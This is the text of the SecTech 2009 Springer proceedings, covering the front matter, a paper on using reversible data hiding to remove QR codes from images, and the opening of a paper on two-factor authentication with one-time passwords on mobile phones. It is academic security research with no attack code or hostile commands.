Security Technology (Communications in Computer and Information Science, 58)

Communications in Computer and Information Science

58

´ ˛zak Tai-hoon Kim Dominik Sle Wai-Chi Fang Kirk P. Arnett (Eds.)

Security Technology International Conference, SecTech 2009 Held as Part of the Future Generation Information Technology Conference, FGIT 2009 Jeju Island, Korea, December 10-12, 2009 Proceedings

13

Volume Editors ´ ˛zak Dominik Sle University of Warsaw & Infobright Inc., Poland E-mail: [email protected] Tai-hoon Kim Hannam University, Daejeon, South Korea E-mail: [email protected] Wai-Chi Fang National Chiao Tung University, Hsinchu, Taiwan E-mail: [email protected] Kirk P. Arnett Mississippi State University, Mississippi State, MS, USA E-mail: [email protected]

Library of Congress Control Number: 2009940048 CR Subject Classification (1998): E.3, C.2, D.2, D.4.6, K.6.5, C.2.3 ISSN ISBN-10 ISBN-13

1865-0929 3-642-10846-6 Springer Berlin Heidelberg New York 978-3-642-10846-4 Springer Berlin Heidelberg New York

This work is subject to copyright. All rights are reserved, whether the whole or part of the material is concerned, specifically the rights of translation, reprinting, re-use of illustrations, recitation, broadcasting, reproduction on microfilms or in any other way, and storage in data banks. Duplication of this publication or parts thereof is permitted only under the provisions of the German Copyright Law of September 9, 1965, in its current version, and permission for use must always be obtained from Springer. Violations are liable to prosecution under the German Copyright Law. springer.com © Springer-Verlag Berlin Heidelberg 2009 Printed in Germany Typesetting: Camera-ready by author, data conversion by Scientific Publishing Services, Chennai, India Printed on acid-free paper SPIN: 12805136 06/3180 543210

Foreword

As future generation information technology (FGIT) becomes specialized and fragmented, it is easy to lose sight that many topics in FGIT have common threads and, because of this, advances in one discipline may be transmitted to others. Presentation of recent results obtained in different disciplines encourages this interchange for the advancement of FGIT as a whole. Of particular interest are hybrid solutions that combine ideas taken from multiple disciplines in order to achieve something more significant than the sum of the individual parts. Through such hybrid philosophy, a new principle can be discovered, which has the propensity to propagate throughout multifaceted disciplines. FGIT 2009 was the first mega-conference that attempted to follow the above idea of hybridization in FGIT in a form of multiple events related to particular disciplines of IT, conducted by separate scientific committees, but coordinated in order to expose the most important contributions. It included the following international conferences: Advanced Software Engineering and Its Applications (ASEA), Bio-Science and Bio-Technology (BSBT), Control and Automation (CA), Database Theory and Application (DTA), Disaster Recovery and Business Continuity (DRBC; published independently), Future Generation Communication and Networking (FGCN) that was combined with Advanced Communication and Networking (ACN), Grid and Distributed Computing (GDC), Multimedia, Computer Graphics and Broadcasting (MulGraB), Security Technology (SecTech), Signal Processing, Image Processing and Pattern Recognition (SIP), and uand e-Service, Science and Technology (UNESST). We acknowledge the great effort of all the Chairs and the members of advisory boards and Program Committees of the above-listed events, who selected 28% of over 1,050 submissions, following a rigorous peer-review process. Special thanks go to the following organizations supporting FGIT 2009: ECSIS, Korean Institute of Information Technology, Australian Computer Society, SERSC, Springer LNCS/CCIS, COEIA, ICC Jeju, ISEP/IPP, GECAD, PoDIT, Business Community Partnership, Brno University of Technology, KISA, K-NBTC and National Taipei University of Education. We are very grateful to the following speakers who accepted our invitation and helped to meet the objectives of FGIT 2009: Ruay-Shiung Chang (National Dong Hwa University, Taiwan), Jack Dongarra (University of Tennessee, USA), Xiaohua (Tony) Hu (Drexel University, USA), Irwin King (Chinese University of Hong Kong, Hong Kong), Carlos Ramos (Polytechnic of Porto, Portugal), Timothy K. Shih (Asia University, Taiwan), Peter M.A. Sloot (University of Amsterdam, The Netherlands), Kyu-Young Whang (KAIST, South Korea), and Stephen S. Yau (Arizona State University, USA).

VI

Foreword

We would also like to thank Rosslin John Robles, Maricel O. Balitanas, Farkhod Alisherov Alisherovish, and Feruza Sattarova Yusfovna – graduate students of Hannam University who helped in editing the FGIT 2009 material with a great passion.

October 2009

Young-hoon Lee Tai-hoon Kim Wai-chi Fang Dominik Ślęzak

Preface

We would like to welcome you to the proceedings of the 2009 International Conference on Security Technology (SecTech 2009), which was organized as part of the 2009 International Mega-Conference on Future Generation Information Technology (FGIT 2009), held during December 10–12, 2009, at the International Convention Center Jeju, Jeju Island, South Korea. SecTech 2009 focused on the various aspects of advances in security technology with computational sciences, mathematics and information technology. It provided a chance for academic and industry professionals to discuss recent progress in the related areas. We expect that the conference and its publications will be a trigger for further related research and technology improvements in this important subject. We would like to acknowledge the great effort of all the Chairs and members of the Program Committee. Out of 140 submissions to SecTech 2009, we accepted 41 papers to be included in the proceedings and presented during the conference. This gives a roughly 30% acceptance ratio. Four of the papers accepted for SecTech 2009 were published in the special FGIT 2009 volume, LNCS 5899, by Springer. The remaining 37 accepted papers can be found in this CCIS volume. We would like to express our gratitude to all of the authors of submitted papers and to all of the attendees, for their contributions and participation. We believe in the need for continuing this undertaking in the future. Once more, we would like to thank all the organizations and individuals who supported FGIT 2009 as a whole and, in particular, helped in the success of SecTech 2009.

October 2009

Dominik Ślęzak Tai-hoon Kim Wai-chi Fang Kirk P. Arnett

Organization

Organizing Committee General Chair

Wai-chi Fang (National Chiao Tung University, Taiwan)

Program Chairs

Tai-hoon Kim (Hannam University, Korea) Kirk P. Arnett (Mississippi State University, USA)

Advisory Board

Dominik Ślęzak (University of Warsaw and Infobright, Poland) Edwin H-M. Sha (University of Texas at Dallas, USA) Justin Zhan (CMU, USA) Kouichi Sakurai (Kyushu University, Japan) Laurence T. Yang (St. Francis Xavier University, Canada) Byeong-Ho Kang (University of Tasmania, Australia)

Publicity Chairs

Antonio Coronato (ICAR-CNR, Italy) Damien Sauveron (Université de Limoges / CNRS, France) Hua Liu (Xerox Corporation, USA) Kevin R.B. Butler (Pennsylvania State University, USA) Guojun Wang (Central South University, China) Tao Jiang (Huazhong University of Science and Technology, China) Gang Wu (UESTC, China) Yoshiaki Hori (Kyushu University, Japan) Muhammad Khurram Khan (King Saud University, Saudi Arabia)

Publication Chair

Yong-ik Yoon (Sookmyung Women's University, Korea)

Program Committee A. Hamou-Lhadj ByungRae Cha Costas Lambrinoudakis Dieter Gollmann E. Konstantinou Eduardo B. Fernandez Fangguo Zhang Filip Orsag Gerald Schaefer Hiroaki Kikuchi

Hironori Washizaki Hsiang-Cheh Huang Hyun-Sung Kim J.H. Abbawajy Javier Garcia Villalba Jongmoon Baik Jordi Forne Kouichi Sakurai Larbi Esmahi Jungsook Kim

Justin Zhan Lejla Batina Luigi Buglione MalRey Lee Mario Marques Freire Martin Drahansky Masahiro Mambo N. Jaisankar Nobukazu Yoshioka Paolo D'Arco

X

Organization

Petr Hanacek Qi Shi Raphael C.-W. Phan Rhee Kyung-Hyune Robert Seacord Rolf Oppliger Rui Zhang Serge Chaumette

Sheng-Wei Chen Silvia Abrahao Stan Kurkovsky Stefan Katzenbeisser Stefanos Gritzalis Swee-Huay Heng Tony Shan Wen-Shenq Juang

Willy Susilo Yannis Stamatiou Yi Mu Yijun Yu Yingjiu Li Yong Man Ro Young Ik Eom

Table of Contents

Applications of Reversible Data Hiding Techniques with the Quick Response Codes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Hsiang-Cheh Huang, Feng-Cheng Chang, and Wai-Chi Fang

1

A New Approach in T-FA Authentication with OTP Using Mobile Phone . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Abdulaziz S. Almazyad and Yasir Ahmad

9

Correlating Alerts into Compressed Graphs Using an Attribute-Based Method and Time Windows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Seyed Hossein Ahmadinejad and Saeed Jalili

18

A Study on Secure Contents Using in Urban Computing . . . . . . . . . . . . . . Hoon Ko, Jongmyung Choi, and Carlos Ramos

26

Shadow Generation Protocol in Linguistic Threshold Schemes . . . . . . . . . Marek R. Ogiela and Urszula Ogiela

35

Analysis of Handwritten Signature Image . . . . . . . . . . . . . . . . . . . . . . . . . . . Debnath Bhattacharyya, Poulami Das, Samir Kumar Bandyopadhyay, and Tai-hoon Kim

43

The Design of Signature Selection for Protecting Illegal Outflow of Sensitive Information in Mobile Device . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Bo-heung Chung, Min-ho Han, and Ki-young Kim Hardware Based Data Inspection for USB Data Leakage Prevention . . . . DongHo Kang, BoHeung Jung, and KiYoung Kim Grayscale Image Classification Using Supervised Chromosome Clustering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Debnath Bhattacharyya, Poulami Das, Samir Kumar Bandyopadhyay, and Tai-hoon Kim Towards the Integration of Security Aspects into System Development Using Collaboration-Oriented Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Linda Ariani Gunawan, Peter Herrmann, and Frank Alexander Kraemer

51 57

64

72

Impact of Malicious Node on Broadcast Schemes . . . . . . . . . . . . . . . . . . . . . Aneel Rahim and Fahad bin Muyaha

86

Hierarchical Identity-Based Identification Schemes . . . . . . . . . . . . . . . . . . . Ji-Jian Chin, Swee-Huay Heng, and Bok-Min Goi

93

XII

Table of Contents

The Trend of the Security Research for the Insider Cyber Threat . . . . . . Jaeseung Hong, Jongwung Kim, and Jeonghun Cho

100

MIMO Wiretap Channel: A Scalar Approach . . . . . . . . . . . . . . . . . . . . . . . . Mohammad Rakibul Islam and Jinsang Kim

108

Security Testing for Operating System and Its System Calls . . . . . . . . . . . Gaoshou Zhai, Hanhui Niu, Na Yang, Minli Tian, Chengyu Liu, and Hengsheng Yang

116

Efficient Group Signature with Forward Secure Revocation . . . . . . . . . . . . Haimin Jin, Duncan S. Wong, and Yinlong Xu

124

Detecting Distributed Denial of Service Attack Based on Multi-feature Fusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Jieren Cheng, Jianping Yin, Yun Liu, Zhiping Cai, and Chengkun Wu Researching on Cryptographic Algorithm Recognition Based on Static Characteristic-Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Tie-Ming Liu, Lie-hui Jiang, Hong-qi He, Ji-zhong Li, and Xian Yu Verification of Security-Relevant Behavior Model and Security Policy for Model-Carrying Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Yonglong Wei, Xiaojuan Zheng, Jinglei Ren, Xudong Zheng, Chen Sun, and Zhenhao Li

132

140

148

Feature Level Fusion of Biometrics Cues: Human Identification with Doddington’s Caricature . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Dakshina Ranjan Kisku, Phalguni Gupta, and Jamuna Kanta Sing

157

A Study on the Interworking for SIP-Based Secure VoIP Communication with Security Protocols in the Heterogeneous Network . . . . . . . . . . . . . . . . Seokung Yoon, Hyuncheol Jung, and Kyung-Seok Lee

165

DDoS Attack Detection Using Three-State Partition Based on Flow Interaction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Jieren Cheng, Boyun Zhang, Jianping Yin, Yun Liu, and Zhiping Cai

176

A Development of Finite State Machine Create Tool for Cryptography Module Validation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Jae-goo Jeong, Seung-yong Hur, and Gang-Soo Lee

185

A Privacy-Aware System Using Threat-Based Evaluation and Feedback Method in Untrusted Ubiquitous Environments . . . . . . . . . . . . . . . . . . . . . . Yuan Tian, Biao Song, and Eui-Nam Huh

193

Fusion of Multiple Matchers Using SVM for Offline Signature Identification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Dakshina Ranjan Kisku, Phalguni Gupta, and Jamuna Kanta Sing

201

Table of Contents

XIII

A Two-Factor Mutual Authentication Scheme Using Biometrics and Smart Card . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Sheikh Ziauddin

209

Secure Collection Tree Protocol for Tamper-Resistant Wireless Sensors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Peter Pecho, Jan Nagy, Petr Han´ aˇcek, and Martin Drahansk´y

217

Accelerometer Based Digital Video Stabilization for Security Surveillance Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Martin Drahansk´y, Filip Ors´ ag, and Petr Han´ aˇcek

225

Escrowed Deniable Identification Schemes . . . . . . . . . . . . . . . . . . . . . . . . . . . Pairat Thorncharoensri, Qiong Huang, Willy Susilo, Man Ho Au, Yi Mu, and Duncan Wong

234

Insights into Malware Detection and Prevention on Mobile Phones . . . . . Qiang Yan, Yingjiu Li, Tieyan Li, and Robert Deng

242

Automation of Post-exploitation: Focused on MS-Windows Targets . . . . . Mohammad Tabatabai Irani and Edgar R. Weippl

250

Speaker Dependent Frequency Cepstrum Coefficients . . . . . . . . . . . . . . . . . Filip Ors´ ag

258

Towards the Detection of Encrypted BitTorrent Traffic through Deep Packet Inspection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . David A. Carvalho, Manuela Pereira, and M´ ario M. Freire A Simple Encryption Scheme for Binary Elliptic Curves . . . . . . . . . . . . . . Brian King Analysis of Text Complexity in a Crypto System – A Case Study on Telugu . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M.S.V.S. Bhadri Raju, B. Vishnu Vardhan, G.A. Naidu, L. Pratap Reddy, and A. Vinaya Babu Symmetric-Key Encryption for Wireless Internet SCADA . . . . . . . . . . . . . Rosslin John Robles and Min-Kyu Choi

265 273

281

289

An Efficient Pre-filtering Mechanism for Parallel Intrusion Detection Based on Many-Core GPU . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Chengkun Wu, Jianping Yin, Zhiping Cai, En Zhu, and Jieren Cheng

298

Author Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

307

Applications of Reversible Data Hiding Techniques with the Quick Response Codes Hsiang-Cheh Huang1, Feng-Cheng Chang2, and Wai-Chi Fang3 1

National University of Kaohsiung, Kaohsiung 811, Taiwan [email protected] 2 Tamkang University, I-Lan 262, Taiwan [email protected] 3 National Chiao-Tung University, Hsinchu 300, Taiwan [email protected]

Abstract. The goal of quick response (QR) codes aims at convenience-oriented applications for mobile phone users. People can use the mobile phone cameras to capture the code with random patterns, usually displayed at the corner of web page, and then the hyperlink corresponding to the QR code can be accessed. Since QR code looks like random noise, its existence can greatly reduce the value of the original image. With the aid of reversible data hiding technique, we propose a scheme such that when the image containing the QR code is browsed, the hyperlink corresponding to the QR code is accessed first. Then, the QR code can get vanished and the original image can be recovered to retain the information conveyed therein. Simulation results demonstrate the applicability of the proposed algorithm. Keywords: Quick response (QR) code, reversible data hiding, histogram, difference expansion.

1 Introduction The proliferation of Internet usage has made people to link to the web pages easily by using PC, PDA, or mobile phone over the wired or wireless networks. Particularly, for users using the mobile phones to browse the web pages, it has brought much more conveniences to their daily lives [1]. As people know, comparing the time consumption between the computer keyboard and the mobile phone keypad for inputting the URL (Uniform Resource Locator), by using the mobile phone keypad brings much more inconveniences and difficulties for linking to the web pages. To solve this problem, the quick response (QR) code has emerged. The QR code can be easily seen from web pages or posters nowadays. It is a twodimensional code in square shape, mostly represented by binary form (black and white pixels), attached somewhere in the web pages or posters. Colorized QR codes are also in existence. At the beginning, the purpose for the QR code is to utilize the quick connection to the specific web page with the URL information converted to the QR code pattern. And from the viewpoint of watermarking researches [1], QR code can be regarded as the visible watermark. Since visible watermark cause the D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 1–8, 2009. © Springer-Verlag Berlin Heidelberg 2009

2

H.-C. Huang, F.-C. Chang, and W.-C. Fang

degradation of image quality both objectively and subjectively, how to effectively remove the watermark and to retain the information conveyed in the original image seems an interesting topic for applications. Here we propose an algorithm and the associated integration that can utilize the capability of the QR code, and can effectively recover the original image in addition to the removal the QR code. Once the image containing the QR code is browsed, the designated web page is accessed, and the original image is recovered back by use of the reversible data hiding techniques to be described shortly. This paper is organized as follows. In Sec. 2, we present some fundamental descriptions of the QR codes. Then, in Sec. 3, we review two different kinds of reversible data hiding techniques and the integration with QR codes. Simulation results are demonstrated in Sec. 4, which suggest the applicability of the algorithm and the integration proposed. Finally, we conclude this paper in Sec. 5.

2 Background Descriptions of QR Codes The QR (quick response) code is a 2-dimensional bar code, created by Japanese corporation Denso-Wave in 1994. It is also standardized by Japanese Industrial Standards (JIS), with the name JIS-X-0510: 1999 QR Code [2]. QR Codes can be easily seen from web pages, or advertisements in posters or newspapers. One example can be depicted in Figure 1(a). This QR code contains the URL information of the website of original image in Figure 1(b), or http://www.lenna.org/. After encoding, the square, binary image with the size of 135 × 135 is produced. Besides, Figure 1(b) denotes the practical scenario for the utility of the QR code. It is inserted into the corner of the original image. We take the commonly seen test image Lena with the image size of 1024 × 1024 for instance. The major purpose for the QR codes is for mobile phone users to link to the web page corresponding to the QR code quickly. Most mobile phones can read this code by using the camera on the phone, and then the hyperlink information contained in the QR Codes can be deciphered, and the web page can be displayed on the screen of the mobile phone. Comparing to conventional schemes for accessing the homepages with the mobile phones, users need not to type the alphanumeric characters in the URL; by shooting the QR Code with the mobile phone camera, the webpage can be shown instantly and lots of time for inputting the alphanumeric characters can be saved. However, the QR code is still in the original image, and hence the degraded quality of image can be expected. Different from the conventional bar codes, the QR codes offer much more capacities for hiding information, which can be classified as follows: ¾ ¾ ¾ ¾

Numeric only: at most 7089 characters; Alphanumeric: at most 4296 characters; Byte format: at most 2953 bytes; Japanese character: at most 1817 characters.

Since the QR code can be captured by mobile phone cameras, some errors might be induced, and hence the captured QR code needs to have some error correcting capabilities. Hence, the QR code can correct 7% to 30% of the codeword based on different error correction levels by using the Reed Solomon codes [2].

Applications of Reversible Data Hiding Techniques with the Quick Response Codes

(a)

3

(b)

Fig. 1. Test materials in this paper. (a) The QR code with size 135 × 135 , containing the hyperlink of http://www.lenna.org/. (b) The grey level image “lena” with size 1024× 1024 , containing the QR code at lower-right corner.

From the watermarking perspective, the QR code can be regarded as the visible watermark. For instance, at the lower-right portion of Figure 1(b), the pixels in the original image of this region are directly replaced by the QR code. After capturing the QR code, further procedures, such as shopping online, or obtaining more information about the image itself, can be performed with the browsers. Even though this brings conveniences to the access of web pages, quality degradation of original image can be 135 135 expected even though only 1024 × 1024 × 100% = 1.74% of the total image area is

occupied. The peak signal-to-noise ratio (PSNR) is only 22.81 dB in Figure 1(b). In addition, it is sometimes inevitable that important information of the original image might reside in the corner portions. By replacing the corner portions of the original image with the QR code might remove the inherent information conveyed. Thus, we propose an algorithm by using reversible data hiding to hide the corner portion of original image into the rest of the original image in advance, and replace such a portion by the QR code. After browsing the image containing the QR code, the QR code is removed first, and the original data can be recovered back with reversible data hiding from the rest of the image.

3 Algorithms of Reversible Data Hiding and Integration with QR Codes Reversible data hiding is a new branch in data hiding researches. At the encoder, the data are hidden into original image, and output looks identical to original image. At decoder, unlike conventional watermarking that only the watermark needs to be extracted, reversible data hiding requires both the hidden data and the original image should be perfectly recovered.

4

H.-C. Huang, F.-C. Chang, and W.-C. Fang

3.1 Histogram-Modification for Reversible Data Hiding

Histogram-modification scheme for data embedding is adopted from [3], which can be described as follows. Step 1. Generate the histogram of original image. The luminance with the maximal occurrences in histogram is labeled as “max point,” while that with no occurrence is labeled as “zero point.” The luminance values of “max” and “zero” points, each is represented by 8 bits, are treated as side information. Hence, a total of 16 bits should be transmitted to the receiver for data extraction. Step 2. Select the range between max and zero points. The range of luminance values between max and zero points is recorded in the histogram. Step 3. Modify of luminance values in selected range. In the region between max and zero points recorded in Step 2, luminance values between the max and zero points are altered in advance. Luminance values in the selected range are all increased by 1. Step 4. Embed the data. For the embedding of binary watermark, if the watermark bit is ‘1,’ the luminance value is increased by 1; if the watermark bit is ‘0,’ it is decreased by 1. In extracting both the hidden data and the original image, the following steps should apply accordingly. Step 1. Locate selected range with side information. Luminance values between the max and zero points are compared. Step 2. Extract the hidden data relating to the original. Every pixel in the output image is scanned and examined sequentially to extract the data bits to compare to Step 3 of the embedding procedure. Step 3. Obtain the original image. By moving the histogram into its original form, the original content is recovered. The histogram-based reversible data hiding has the advantages of ease of implementation and little side information produced. On the contrary, the number of bits for embedding, or the capacity, might not be enough for the hidden data. Hence, the difference expansion (DE) scheme described in Sec. 3.2, based on the concept of wavelet transform, was proposed. 3.2 Difference-Expansion for Reversible Data Hiding

If we group every 1× 4 block into a unit, called the quad, reversible data hiding can be performed by using the relationships among the four pixels. The scheme called difference expansion of quads (DEQ), is proposed in [4]. A quad is a 1× 4 vector (u1 , u 2 , u 3 , u 4 ) formed from four pixel values from a 2× 2 block. By following DE, we then calculate the following values:

⎢ u + u1 + u 2 + u 3 ⎥ , v0 = ⎢ 0 ⎥ 4 ⎣ ⎦

(1)

v1 = u1 − u0 ,

(2)

Applications of Reversible Data Hiding Techniques with the Quick Response Codes

5

v2 = u 2 − u 0 ,

(3)

v3 = u 3 − u 0 ,

(4)

where ⎣⋅⎦ denotes the floor function. For embedding three bits, b1, b2, b3 into one quad, v~1 = 2 ⋅ ⎣v21 ⎦ + b1 ,

(5)

v~2 = 2 ⋅ ⎣v22 ⎦ + b2 ,

(6)

v v~3 = 2 ⋅ ⎣ 23 ⎦ + b3 .

(7)

By doing so, the capacity for DEQ is 0.75 bit/pixel, meaning that at most three quarters of the image size, represented by bit, can be hidden. However, due to the overflow problems in Eqs. (2) to (4), some quad positions might not be suitable for embedding the three bits corresponding to such a quad. Suitable positions for embedding, called the location map, are the side information generated. Since most quads are suitable for embedding three bits each for natural images, the positions that are not suitable for embedding, called the non-location map, is recorded to reach the reduced size of side information. From the derivations above, in comparison with Sec. 3.1, the DEQ scheme has the advantage to embed a large amount of data, while the location map needs to be obtained at the decoder for performing the extraction of both original image and hidden data [5]. 3.3 Proposed Scheme for Integration

Both the algorithms in Sec. 3.1 and Sec. 3.2 have their own drawbacks. Hence, we combine both algorithms altogether by considering their advantages, and integrate with the QR code. Step 1. Generate the QR code with the information relating to the original image, and obtain the size of the QR code image. Step 2. Produce the non-location map for data embedding in DEQ. Step 3. Choose a threshold for embedding the information at the beginning of nonlocation map with histogram-based scheme. Step 4. If the sum of peak occurrences is larger than the threshold, hide the beginning of non-location map into the histogram. If not, lower the threshold value in Step 2. Step 5. Embed the remaining non-location map information with the DEQ method. Step 6. Replace the lower-right corner by the QR code generated in Step 1. Step 7. Output both the image with QR code, and the side information. On the other hand, extraction of data and original is simple, which can be performed as follows. Step 1. Locate the QR code area in the image and decipher the information contained in QR code.

6

H.-C. Huang, F.-C. Chang, and W.-C. Fang

Step 2. Generate the histogram of the image other except for the QR code portion. Step 3. Reveal selected range with side information. Step 4. Produce the beginning of non-location map locations from the histogram. Step 5. Extract the portion previously occupied in the QR code, and recover original with DEQ scheme. By following the descriptions above, we can effectively hide the QR code image into the rest of the original image with high capacity and low overhead. After the removal of the QR code image, the original information contained in such an area can be gathered back, and the original image can be obtained.

4 Simulation Results We perform the following items for assessing the applicability of our algorithm. At the encoder: ¾ ¾ ¾

generate the QR code; embed QR code with proposed algorithm; post the image containing QR code in some web page.

At the decoder: ¾ ¾ ¾

access the image containing QR code with the browser; decode the QR code information and remove the QR code; recover the original image.

Table 1 depicts the experiments with four different test images and the corresponding URL information for generating the QR code. All the QR codes have the sizes of 135 × 135 . The results with the third column, the baboon picture, are demonstrated in Figure 1. For all the pictures, 135 × 135 × 8 = 145800 bits at the lower-right portion of original image should be hidden, thus, our algorithm is capable of hiding such an amount of data. After inserting the QR code, the image qualities have degraded to 21.59 to 22.81 dB. At the decoder, after decoding the QR code, a new page is popped up for representing the URL in the QR code, and information relating to the original image can be provided, or online shopping can be proceeded consequently, shown in Figure 2. Next, after removing the QR code, the original is recovered, and we can see that all the mean square errors (MSE’s) at the final row of Table 1 are all 0.00, meaning that the recovered images are identical to their original counterpart. Table 1. Comparisons of image qualities

Test image Image size Image quality with QR QR information MSE between original and recovered images

Lena 1024× 1024

baboon 1024× 1024

airplane 1024× 1024

pepper 1024× 1024

22.81 dB

21.71 dB

22.08 dB

21.59 dB

http://www. lenna.org

http://www. nuk.edu.tw

http://www. yahoo.com.tw

http://www. google.com

0.00

0.00

0.00

0.00

Applications of Reversible Data Hiding Techniques with the Quick Response Codes

7

Fig. 2. After decoding, both the web page corresponding to QR code and the original can be obtained

5 Conclusions In this paper, we described the popularity of the use of QR codes. QR codes can facilitate the access of web pages with mobile phones by capturing the specific corner in the image. As we can see from practical scenarios, the existence of such a code degrades the quality of the original image or even conceals some information contained in the original image inherently. Considering the facilities offered by the QR codes, users can access the webpage with the QR code first, and then it can be removed from the corner of the image, and the original image can be recovered back. The QR code information can be deciphered to some URL relating to the original image, and more information corresponding to the original image can be discovered by the users, such as online shopping. More applications can also be explored in the future.

8

H.-C. Huang, F.-C. Chang, and W.-C. Fang

Acknowledgments. The authors would like to thank National Science Council (Taiwan, R.O.C) for supporting this paper under Grant No. NSC97-2221-E-390-011 and NSC98-2221-E-390-017.

References 1. Pan, J.S., Huang, H.-C., Jain, L.C., Fang, W.C. (eds.): Intelligent Multimedia Data Hiding. Springer, Heidelberg (2007) 2. Denso Wave Incorporated: QR Code standardization (2003), http://www.denso-wave.com/qrcode/qrstandard-e.html 3. Ni, Z., Shi, Y.-Q., Ansari, N., Su, W.: Reversible Data Hiding. IEEE Trans. Circuits Syst. Video Technol. 16, 354–362 (2006) 4. Alattar, A.M.: Reversible Watermark Using the Difference Expansion of a Generalized Integer Transform. IEEE Trans. Image Process. 13, 1147–1156 (2004) 5. Hu, Y., Lee, H.K., Li, J.: DE-Based Reversible Data Hiding with Improved Overflow Location Map. IEEE Trans. Circuits Syst. Video Technol. 19, 250–260 (2009)

A New Approach in T-FA Authentication with OTP Using Mobile Phone Abdulaziz S. Almazyad and Yasir Ahmad Center of Excellence in Information Assurance College of Computer Engineering and Sciences King Saud University, KSA [email protected], [email protected]

Abstract. Security will never go out of style. The most existing network applications authenticate users with an username/password system. Such systems using the reusable passwords are susceptible to attacks based on the theft of the password. To overcome the above susceptibility in the existing applications There exist an authentication mechanism known as Two factor Authentication (T-FA). Two factor authentication is a process used to authenticate or verify the identity of a person or other entity requesting access under security constraints. It is a system wherein two different factors are used in conjunction to authenticate. Using two factors as opposed to one factor generally delivers a higher level of authentication assurance. With One-time password (OTP) a factor makes it more difficult to gain unauthorized access to restricted resources, like a computer account, bank account etc. In this paper, we propose a new approach in implementing the two factor authentication with one of the factor as one time password key generation using mobile phones.

1 Introduction Authentication is the process of identifying a user in a system to access it. Access to a system normally depends upon the identity of the user who requests access to a particular resource. Authentication is a major concern while making a secure system. The most commonly used solution today for authentication is the username and password. The more number of services the more number of username and password pairs that the user needs to remember. It is already known that so many people experiences that it is impossible to remember all the username and password combinations. Therefore they use the same combinations for all their services and select passwords that are easily remembered. The intruders take this to their advantage and act as a justified user [5][6].These same combination pairs strongly reduce the security of an authentication mechanism. The more secure way of authentication may be implemented with Smart Cards, an Authentication Server or even a PKI [11]. Authentication of a person in a system can be achieved by one of the following factors or by their combination: 1. 2. 3.

Something you know ( e.g., code numbers) Something you are ( e.g., biometrics) Something you have (e.g., pass, ID card or token)

D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 9–17, 2009. © Springer-Verlag Berlin Heidelberg 2009

10

A.S. Almazyad and Y. Ahmad

Section 2 explains the method of two factor authentication with various authentication types and section 3 overviews the one time password generation methodology, using the above two technologies we provide a solution to implement a secure system. Section 4 describes the related technology and its benefits. Section 5 describes the related works and their disadvantages. Section 6 presents our work and advantages over the work done in section 5. Finally, section 7 and 8 draws the conclusion, future work and the references respectively.

2 T-FA (Two-Factor Authentication) Two-factor authentication (T-FA) is a system where two different factors are used to authenticate a user. It adds more security to the system because the user must have to provide two factors of authentication i.e., password or passcode. The two-factor authentication combines ‘something that you know’ (password – PIN), with ‘something that you have’ (hardware token, mobile phone) or ‘something that you are’ (biometric ), to actually identifies the correct person that he claims to be. Two factor authentication means leveraging at least two of the authentication methods mentioned above. Using two factors as opposed to one factor generally delivers a higher level of authentication assurance. In order to gain access to specific resources, an un-authorized user or intruder needs to have access to ‘two factors’: the secret codes (password PIN) and the authentication device. T-FA could tremendously reduce the possibility of online identity theft [8], because the victim's secret password would no longer be sufficient for an intruder to access their information. However, T-FA is still vulnerable to trojan and man-in-the-middle attacks. [1] 2.1 T-FA Implementations There are number of methods available to practically implement the T-FA. The combination of different implementations is used, e.g., an ATM card and a PIN, in this case the term two-factor authentication is used. 2.2 Authentication Types Tokens A security token (or a hardware token) is a small device that the user carries to authorize access to a network resource. Magnetic Cards Magnetic cards e.g., credit cards, debit cards, ATM cards, etc provide a possible two-factor authentication. Mobile Phones A mobile phone could be used as a token device using SMS messaging or an interactive telephone call.

A New Approach in T-FA Authentication with OTP Using Mobile Phone

11

Biometrics Biometrics such as face recognition, voice authentication and fingerprinting. There are more authentication types which are not possible to discuss here and are beyond the scope of this paper.

3 OTP (One Time Password) Traditional static passwords can be easily accessed by an un-authorized intruder after making some attempts. An authentication method that can overcome this issue with the security of the system is one time password generation each time [2][3][4]. One-Time Password provides a secure and easy to use authentication solution, There are many implementations of OTP in existence today [7][8][9][10][11]. 1. 2. 3.

4. 5.

A mathematical algorithm is used to generate a new password based on the previous one. Time-synchronization based method between the authentication server and the client providing the password. A mathematical algorithm is used, but the new password is based on a challenge (e.g., a random number chosen by the authentication server) and a counter instead of being based on the previous password. A list of passwords printed on paper. Portable electronic devices (e.g., mobile phones)

